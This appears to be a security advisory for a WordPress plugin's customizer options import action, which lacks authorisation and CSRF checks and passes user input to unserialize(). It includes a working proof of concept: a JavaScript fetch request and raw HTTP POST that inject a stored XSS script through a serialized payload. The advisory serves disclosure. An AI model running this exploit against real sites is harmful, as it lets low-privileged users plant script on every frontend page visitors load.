The plugin does not have any authorisation and CSRF checks in the insight_customizer_options_import (available to any authenticated user), does not validate user input before passing it to unserialize(), nor sanitise and escape it before outputting it in the response. As a result, it could allow users with a role as low as Subscriber to perform PHP Object Injection, as well as Stored Cross-Site Scripting attacks
let formData = new FormData; formData.append('import-file', new Blob(['a:1:{s:16:"background_color";s:34:"</style><script>alert(/XSS/);</script>";}'])) formData.append('action', 'insight_customizer_options_import'); fetch("https://example.com/wp-admin/admin-ajax.php", { "body": formData, "method": "POST" }) .then(response => response.text()) .then(data => console.log(data)); POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------189498983625966260651015514771 Content-Length: 458 Connection: close Cookie: [any authenticated user] -----------------------------189498983625966260651015514771 Content-Disposition: form-data; name="import-file"; filename="blob" Content-Type: application/octet-stream a:1:{s:16:"background_color";s:34:"</style><script>alert(/XSS/);</script>";} -----------------------------189498983625966260651015514771 Content-Disposition: form-data; name="action" insight_customizer_options_import -----------------------------189498983625966260651015514771-- The XSS will be triggered in all frontend pages
Krzysztof Zając
Krzysztof Zając
Yes
2021-12-28 (about 1 years ago)
2022-02-15 (about 11 months ago)
2022-04-08 (about 9 months ago)